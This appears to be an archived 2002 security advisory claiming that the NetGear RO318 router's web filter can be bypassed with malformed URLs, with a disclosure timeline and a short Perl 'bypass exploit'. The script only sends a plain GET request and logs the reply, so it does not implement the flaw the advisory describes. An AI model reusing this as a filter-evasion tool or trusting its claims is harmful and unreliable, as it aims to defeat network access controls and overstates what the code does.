exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

netgear.txt

netgear.txt
Posted Jan 31, 2002
Authored by Null Byte Security | Site home.tampabay.rr.com

NetGear RO318 HTTP Filter Advisory - The firmware does not check URL's well enough and will send out restricted content if given a malformed URL. Includes perl exploit.

tags | exploit, web, perl
SHA-256 | 6e07fabd2f010c02fcaec5a1372c9f6341cee8b1bd9566de7cbd913ccf7a0bbc

netgear.txt

Change Mirror Download
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ NetGear RO318 HTTP Filter Advisory =+
=+ Null Byte Security =+
=+ http://home.tampabay.rr.com/nbs/ =+
=+ don't call it a come back =+
=+ nbs@tampabay.rr.com =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ Contents Table =+
=+ =+
=+ 1.About =+
=+ 2.Affected =+
=+ 3.Details =+
=+ 4.Contact =+
=+ 5.Conclusion =+
=+ 6.Thanks =+
=+ 7.Greets =+
=+ 8.POC =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 1.About =+
=+ =+
=+ NETGEAR's sturdy metal RO318 Cable/DSL Security Router with 8-port switch =+
=+ fully protects your small office network against intrusion. Equipped with =+
=+ Stateful Packet Inspection to prevent Denial of Service (DoS) attacks, and =+
=+ Network Address Translation (NAT) to maintain network security against =+
=+ hackers, it ensures prolonged up time and maximized productivity for your =+
=+ network. Web content filtering options let network administrators establish =+
=+ restricted access policies - based on the time of day, day of week, Web =+
=+ address keyword - and receive regular reports and instant alerts via e-mail on =+
=+ hacker attempts and browsing activities. Web-based installation instructions =+
=+ make setup easy. Your network up and running, and sharing high-speed Internet =+
=+ access with up to 253 users, in less than an hour. =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 2.Affected =+
=+ =+
=+ NetGear RO318 Cable/DSL Security Router =+
=+ =+
=+ Although the NetGear RO318 is the only router listed here we are sure there =+
=+ other routers that use the RO318's web filtering technology. =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 3.Details =+
=+ =+
=+ We are not too sure of the details ourselves because of time restraints, but =+
=+ we do have an idea. One, the web filtering component in the firmware only =+
=+ checks for fully constructed requests and thus sending a malformed, somewhat, =+
=+ request results in the retrieval of restricted content. =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 4.Contact =+
=+ =+
=+ December 2 2001: Contacted NetGear =+
=+ December 2 2001: Contacted online support =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460001) =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460003) =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460006) =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460008) =+
=+ December 8 2001: Five working days passed =+
=+ December 20 2001: Eighteen days passed =+
=+ December 20 2001: Advisory released on home.tampabay.rr.com/nbs/ =+
=+ December 26 2001: POC released =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 5.Conclusion =+
=+ =+
=+ This is definitely a security vulnerability and not a feature. We hope Net =+
=+ Gear will fix this with their next firmware release so administrators can =+
=+ restrict necessary web-content without having to worry about this bug. =+
=+ =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 6.Thanks =+
=+ =+
=+ Bi0cide for the help =+
=+ Datagram for the help =+
=+ Natas for the help =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 7.Greets =+
=+ =+
=+ Bi0cide, Natas, Datagram, Z, Medium, BrainStorm, Qitest1, Skerbi, RootX11, =+
=+ Doug, Bios Disk, Decypher, Notten, RFP, Johnny (johnny.ihackstuff.com), RFP, =+
=+ Mixter, Pimpshiz, Doxavg, Todd, Sekurity Inc (www.sekurity.net), Packet Storm, =+
=+ Security Focus, and everyone else. =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 8.POC =+
=+ =+
#!/usr/bin/perl
#don't call it a come back
#nbs@tampabay.rr.com

use IO::Socket;
use Getopt::Std;

getopts('h:p:z', \%argv);

if(!defined($argv{h}))
{
print"NetGear RO318 Web Filter Bypass Exploit by Null Byte Security \n";

print"Usage: $0 -h <host> -p <port> \n";
exit;
}

if(defined($argv{h}))
{
&begin
}

sub begin
{
$html = html;
$host = $argv{h};
if(defined $argv{p})
{
$port=$argv{p};
}
else
{
$port = "80";
}

$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $host,
PeerPort => "$port")
or die "Connection Refused.\n";

print $socket "GET / HTTP/1.0\n\n";
while (<$socket>)
{
open(LOG, ">>$html");
print (LOG);
}
close $socket;
}
=+ =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ http://www.wiretrip.net/rfp/policy.html =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close